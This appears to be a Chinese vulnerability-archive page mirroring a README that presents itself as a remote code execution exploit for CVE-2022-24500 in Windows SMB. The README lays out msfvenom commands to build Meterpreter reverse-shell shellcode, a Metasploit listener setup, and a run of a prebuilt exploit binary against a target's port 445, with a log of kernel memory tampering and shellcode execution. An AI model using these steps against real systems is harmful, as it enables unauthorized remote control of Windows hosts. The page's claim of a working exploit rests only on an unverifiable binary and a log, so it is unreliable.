关联漏洞
标题:
Microsoft Windows SMB Server输入验证错误漏洞
(CVE-2022-24500)
描述:Microsoft Windows SMB Server是美国微软(Microsoft)公司的一个网络文件共享协议。它允许计算机上的应用程序读取和写入文件以及从计算机网络中的服务器程序请求服务。 Microsoft Windows SMB Server 存在输入验证错误漏洞。以下产品和版本受到影响:Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows 10 Versi
介绍
# CVE-2022-24500 RCE Exploit
### Windows SMB Remote Code Execution Vulnerability
Vulnerability: Windows 7 - Windows 2022
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24500
### step 1
```Bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.10.22.105 LPORT=4444 -f raw > shellcode.bin
```
### step 2
```Bash
msf5 > use multi/handler
msf5 exploit(multi/handler) > set LHOST 192.10.22.105
LHOST => 192.10.22.105
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > run
```
### Exploit
CVE-2022-24500 ip port
```Bash
C:\>CVE-2022-24500.exe 192.10.22.107 445
CVE-2022-24500 SMB Remote Exploit
[+] Checking... 192.10.22.107 445
[+] 192.10.22.107 445 IsOpen
[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff79480000000
[+] ntoskrnl entry at fffff80645792010
[+] found PML4 self-ref entry 1eb
[+] found HalpInterruptController at fffff79480001478
[+] found HalpApicRequestInterrupt at fffff80645cb3bb0
[+] load shellcode.bin
[+] built shellcode!
[+] KUSER_SHARED_DATA PTE at fffff5fbc0000000
[+] KUSER_SHARED_DATA PTE NX bit cleared!
[+] Wrote shellcode at fffff78000000a00!
[+] Try to execute shellcode!
[+] Exploit Suceess!
```
文件快照
[4.0K] /data/pocs/fb711785c0626bc86318617a67d48ac02131641e
├── [ 32K] CVE-2022-24500.exe
├── [993K] CVE-2022-24500.gif
├── [1.4K] README.md
└── [ 341] shellcode.bin
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。